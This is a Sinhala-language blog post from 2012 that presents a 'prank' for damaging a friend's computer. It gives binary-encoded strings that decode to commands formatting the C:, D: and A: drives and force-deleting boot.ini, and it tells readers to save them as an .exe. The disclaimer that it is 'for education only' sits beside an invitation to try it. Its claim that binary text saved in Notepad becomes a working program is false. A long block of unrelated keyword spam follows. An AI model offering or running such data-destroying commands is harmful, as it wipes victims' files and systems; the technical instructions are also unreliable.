Social Icons

Money For Get a Domain

Tuesday, December 25, 2012

යාලුවට කෙල කරමුද...?


අද මන් කස්ටියට කියන්නෙ පොඩි ගේමක් දෙන හැටි... හැබැයි ටිකක් විතර භායානකයි... ඔව්වා ගානක් නෑනෙ...  ඔන්න එහෙනම් Geමට එන්ටර් උනා...


එහෙනම් කස්ටිය ඔන්න ඔය COAD 1ක notepad 1kක Enter කරගන්නකො... (හැබැයි පරිස්සමින්) ඉටපස්සෙ Save As ගිහින් .exe විදියට Save කරගන්න...
 
01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000
මේ code එකෙන් මෙන්න මේ සිද්දිය සිද්ද වෙනවා. format c:\ /Q/X කෙලින්ම c: drive එක ෆෝමැට් වෙනවා.

01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
මෙන්න මේකෙන් D: එක 


01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
මෙන්න මේකෙන් A: එක 


01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
මේක මෙන්න මෙ විදියට del /F/S/Q c:\boot.ini මේකෙන් boot.ini එක මැකෙනවා. එතකොට PC 1ක boot වෙන්නේ නැතිව යනවා. සොරි තමා... 

සියලුම දෙවල් අධ්‍යාපනය සඳහා පමණක්ම වලංගු වේ. 
(PC 1කට ආතල් 1ක් දෙන්න ඔනෙ නම් මෙක කරලා බලන්න, හැබැයි පස්සෙ මට නම් කියන්නෙපා...  )

ඔන්න එහෙනම් අපි කැපුණා...

Key Words-: 3D 3D printing 3DS 4 4G 5 50 best apps AActa Activate conference Activision Blizzard Michael Acton Smith Adobe Keri Allan Alternate reality games Amazon.com Android Angry Birds Anonymous AOL Apple Apps Apps Pitch Apps rush Arcade and platform Arpanet Artificial intelligence (AI) Assassin's Creed Audioboo Augmented reality Gaming awards B Steve Ballmer Carol Bartz Battlefield Bebo Tim Berners-Lee Best Android apps Best games for Christmas 2012 Best iPhone and iPad apps Jeff Bezos Big data Bing Biometrics BitTorrent BlackBerry Blogging Blu-ray Britain's broadband vision Broadband C Call of Duty Rio Caraeff Paul Carr Quiz and trivia games R Racing games Raspberry Pi Rayman Recommendation sites Reddit Research and development Retro games RIM (Research in Motion) Robots Role playing games Andy Rubin Rumoursville S Safari Samsung Sheryl Sandberg Eric Schmidt Search engines Second Life SEO Sex in games Shoot 'em ups Simulation games Clive Sinclair Steven Sinofsky Skype Smartphone patent wars Smartphones Social innovation camp Software Songkick Sonic the Hedgehog Sony Sopa Spam Sports games Spotify Biz Stone Strategy games Sun Microsystems Super Mario SXSWi Symbian T Tablet computers Talk time Tech City Talks Technobile Technology Technophile TED TEDxObserver Telecoms Television Tetris The Elder Scrolls The internet at 40 The Legend of Zelda Scott Thompson Top 10 UK games Top 100 women: technology Top 20 UK games Trojans Tumblr William Tunstall-Pedoe Twitter U Untangling the web with Aleks Krotoski V Vine Virtual worlds Viruses W Jimmy Wales Web 2.0 Web browsers Web filtering Weekend gaming Weekly roundup Wheels When you should be working Wi-Fi Wii Wii U WikiGame Wikipedia Evan Williams Windows Windows 7 Windows Phone World of Warcraft Worms X Xbox Y Y2K bug Yahoo Yahoo takeover Jerry Yang YouChoose YouTube Z Mark Zuckerberg Zynga A adhesive abrasive acrylic aesthetics aluminium analyse annotationanodise anthropometrics artefact B ball bearing ball pein hammer bandsaw batch production bevel blow moulding brief BSI C CAD caliper cam CAM capacitor carbon steelcasting cantilever centre punch chisel chuck circuit clampm client CNC colour wheel comb joint compliant compression constraints consumer coping saw corporate identity cramp criteria D datadatabasedesigndevelopmentdiedie cutting dimension dividers dovetail dowel drawer durable E economies of scale elastic elevation embossing engineerengineer's square ergonomics evaluation F flux follower function G gear graphics H hammer hand file hydraulic I idler gear input isometric J jig J.I.T. - just in time K kiln L laser L.E.D. - light emitting diode linear M  mallet market research mdf - medium density fibreboard mechanism metre - 1000 millimetres meter micrometer mild steel millimetre mitre N newton O oblique O-ring orthographic output P permanent fixing perspective pewter pic chip pillar drill planning polyethylene polypropylene printed circuit board pulley PVA - glue Q quality quality assurance questionnaire R raster resistor router S safety scissors scriber shear sensor silver steel solder specification spur gear steel stepper motor survey system T template tenon tensile tension Tensol Cement testing thermoplastic thermoset tolerance thyristor toggle clamp transistor try square U V vacuum forming variable resistor vector W weight X X - axis Y Y - axis z Z - axis

No comments:

Post a Comment

ප්‍රයොජනවත් උනානම් මෙතන මොනවහරි ලියල යන්න...

Advertisements

Related Posts Plugin for WordPress, Blogger...